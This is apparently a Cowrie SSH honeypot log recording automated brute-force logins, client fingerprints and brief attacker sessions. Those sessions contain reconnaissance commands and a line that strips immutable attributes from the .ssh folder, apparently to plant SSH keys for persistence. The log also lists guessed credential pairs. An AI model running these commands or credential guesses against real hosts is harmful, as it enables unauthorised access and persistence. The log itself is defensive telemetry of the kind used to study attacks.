{"eventid":"cowrie.login.failed","username":"admin","password":"vfnbkmlf","message":"login attempt [admin/vfnbkmlf] failed","sensor":"my-vps","timestamp":"2025-08-31T07:36:08.772542Z","src_ip":"212.227.235.229","session":"d464121d7ca8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"veteran","message":"login attempt [admin/veteran] failed","sensor":"my-vps","timestamp":"2025-08-31T07:36:09.881088Z","src_ip":"212.227.235.229","session":"d464121d7ca8"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:36:10.989736Z","src_ip":"212.227.235.229","session":"d464121d7ca8"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":57510,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ca64497f1a7","protocol":"ssh","message":"New connection: 102.210.148.92:57510 (1.2.3.4:22) [session: 4ca64497f1a7]","sensor":"my-vps","timestamp":"2025-08-31T07:36:39.292742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:36:39.293427Z","src_ip":"102.210.148.92","session":"4ca64497f1a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:36:39.472736Z","src_ip":"102.210.148.92","session":"4ca64497f1a7"}
{"eventid":"cowrie.login.failed","username":"jacob","password":"dell-2021","message":"login attempt [jacob/dell-2021] failed","sensor":"my-vps","timestamp":"2025-08-31T07:36:40.230246Z","src_ip":"102.210.148.92","session":"4ca64497f1a7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:36:41.411871Z","src_ip":"102.210.148.92","session":"4ca64497f1a7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61200,"dst_ip":"1.2.3.4","dst_port":22,"session":"79ebf8dd1c2b","protocol":"ssh","message":"New connection: 217.72.205.35:61200 (1.2.3.4:22) [session: 79ebf8dd1c2b]","sensor":"my-vps","timestamp":"2025-08-31T07:37:41.731565Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:37:41.732730Z","src_ip":"217.72.205.35","session":"79ebf8dd1c2b"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":55818,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ba1fdab0882","protocol":"ssh","message":"New connection: 102.210.148.92:55818 (1.2.3.4:22) [session: 7ba1fdab0882]","sensor":"my-vps","timestamp":"2025-08-31T07:37:52.781112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:37:52.781773Z","src_ip":"102.210.148.92","session":"7ba1fdab0882"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:37:52.960968Z","src_ip":"102.210.148.92","session":"7ba1fdab0882"}
{"eventid":"cowrie.login.failed","username":"tempusr","password":"123","message":"login attempt [tempusr/123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:37:53.720272Z","src_ip":"102.210.148.92","session":"7ba1fdab0882"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:37:54.902844Z","src_ip":"102.210.148.92","session":"7ba1fdab0882"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.45.50","src_port":43890,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fa4470ec57e","protocol":"ssh","message":"New connection: 14.103.45.50:43890 (1.2.3.4:22) [session: 8fa4470ec57e]","sensor":"my-vps","timestamp":"2025-08-31T07:38:30.290945Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:38:30.525185Z","src_ip":"14.103.45.50","session":"8fa4470ec57e"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.45.50","src_port":43906,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d5a17d0285c","protocol":"ssh","message":"New connection: 14.103.45.50:43906 (1.2.3.4:22) [session: 3d5a17d0285c]","sensor":"my-vps","timestamp":"2025-08-31T07:38:30.712354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:38:30.713240Z","src_ip":"14.103.45.50","session":"3d5a17d0285c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:38:30.911182Z","src_ip":"14.103.45.50","session":"3d5a17d0285c"}
{"eventid":"cowrie.login.success","username":"root","password":"------fuck------","message":"login attempt [root/------fuck------] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:38:32.339039Z","src_ip":"14.103.45.50","session":"3d5a17d0285c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:38:33.213433Z","src_ip":"14.103.45.50","session":"3d5a17d0285c"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-08-31T07:38:33.214232Z","src_ip":"14.103.45.50","session":"3d5a17d0285c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:38:33.413251Z","src_ip":"14.103.45.50","session":"3d5a17d0285c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:38:33.414472Z","src_ip":"14.103.45.50","session":"3d5a17d0285c"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":49586,"dst_ip":"1.2.3.4","dst_port":22,"session":"74ec22982963","protocol":"ssh","message":"New connection: 102.210.148.92:49586 (1.2.3.4:22) [session: 74ec22982963]","sensor":"my-vps","timestamp":"2025-08-31T07:39:03.863010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:39:03.864202Z","src_ip":"102.210.148.92","session":"74ec22982963"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:39:04.027059Z","src_ip":"102.210.148.92","session":"74ec22982963"}
{"eventid":"cowrie.login.failed","username":"user","password":"123qweasd","message":"login attempt [user/123qweasd] failed","sensor":"my-vps","timestamp":"2025-08-31T07:39:04.721580Z","src_ip":"102.210.148.92","session":"74ec22982963"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:39:05.886445Z","src_ip":"102.210.148.92","session":"74ec22982963"}
{"eventid":"cowrie.session.connect","src_ip":"45.78.196.218","src_port":42352,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4743dc8f916","protocol":"ssh","message":"New connection: 45.78.196.218:42352 (1.2.3.4:22) [session: d4743dc8f916]","sensor":"my-vps","timestamp":"2025-08-31T07:39:07.083126Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44002,"dst_ip":"1.2.3.4","dst_port":22,"session":"a08cadf7eb78","protocol":"ssh","message":"New connection: 212.227.125.160:44002 (1.2.3.4:22) [session: a08cadf7eb78]","sensor":"my-vps","timestamp":"2025-08-31T07:39:13.697676Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:39:14.599602Z","src_ip":"212.227.125.160","session":"a08cadf7eb78"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:39:14.600646Z","src_ip":"212.227.125.160","session":"a08cadf7eb78"}
{"eventid":"cowrie.login.success","username":"root","password":"arc","message":"login attempt [root/arc] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:39:20.368718Z","src_ip":"212.227.125.160","session":"a08cadf7eb78"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:39:27.217972Z","src_ip":"212.227.125.160","session":"a08cadf7eb78"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-31T07:39:27.218746Z","src_ip":"212.227.125.160","session":"a08cadf7eb78"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:39:28.287136Z","src_ip":"212.227.125.160","session":"a08cadf7eb78"}
{"eventid":"cowrie.session.closed","duration":"14.6","message":"Connection lost after 14.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:39:28.296221Z","src_ip":"212.227.125.160","session":"a08cadf7eb78"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":33000,"dst_ip":"1.2.3.4","dst_port":22,"session":"855ae1ae1afc","protocol":"ssh","message":"New connection: 201.148.180.50:33000 (1.2.3.4:22) [session: 855ae1ae1afc]","sensor":"my-vps","timestamp":"2025-08-31T07:39:32.057051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:39:33.026508Z","src_ip":"201.148.180.50","session":"855ae1ae1afc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:39:33.027273Z","src_ip":"201.148.180.50","session":"855ae1ae1afc"}
{"eventid":"cowrie.login.success","username":"root","password":"arc","message":"login attempt [root/arc] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:39:38.487927Z","src_ip":"201.148.180.50","session":"855ae1ae1afc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43801,"dst_ip":"1.2.3.4","dst_port":22,"session":"01ef1483bb74","protocol":"ssh","message":"New connection: 212.227.235.229:43801 (1.2.3.4:22) [session: 01ef1483bb74]","sensor":"my-vps","timestamp":"2025-08-31T07:39:38.796353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:39:38.798159Z","src_ip":"212.227.235.229","session":"01ef1483bb74"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:39:38.996428Z","src_ip":"212.227.235.229","session":"01ef1483bb74"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:39:41.535257Z","src_ip":"201.148.180.50","session":"855ae1ae1afc"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-31T07:39:41.535931Z","src_ip":"201.148.180.50","session":"855ae1ae1afc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:39:41.894895Z","src_ip":"45.78.196.218","session":"d4743dc8f916"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:39:41.895677Z","src_ip":"45.78.196.218","session":"d4743dc8f916"}
{"eventid":"cowrie.session.closed","duration":"34.8","message":"Connection lost after 34.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:39:41.897573Z","src_ip":"45.78.196.218","session":"d4743dc8f916"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:39:42.094968Z","src_ip":"201.148.180.50","session":"855ae1ae1afc"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:39:42.096087Z","src_ip":"201.148.180.50","session":"855ae1ae1afc"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":63932,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c2dea642a18","protocol":"ssh","message":"New connection: 79.127.48.196:63932 (1.2.3.4:22) [session: 1c2dea642a18]","sensor":"my-vps","timestamp":"2025-08-31T07:39:42.501812Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty123!@#","message":"login attempt [root/Qwerty123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:39:48.483291Z","src_ip":"212.227.235.229","session":"01ef1483bb74"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:39:50.643794Z","src_ip":"212.227.235.229","session":"01ef1483bb74"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T07:39:50.644479Z","src_ip":"212.227.235.229","session":"01ef1483bb74"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T07:39:50.645583Z","src_ip":"212.227.235.229","session":"01ef1483bb74"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:39:51.310651Z","src_ip":"212.227.235.229","session":"01ef1483bb74"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:39:53.005525Z","src_ip":"212.227.235.229","session":"01ef1483bb74"}
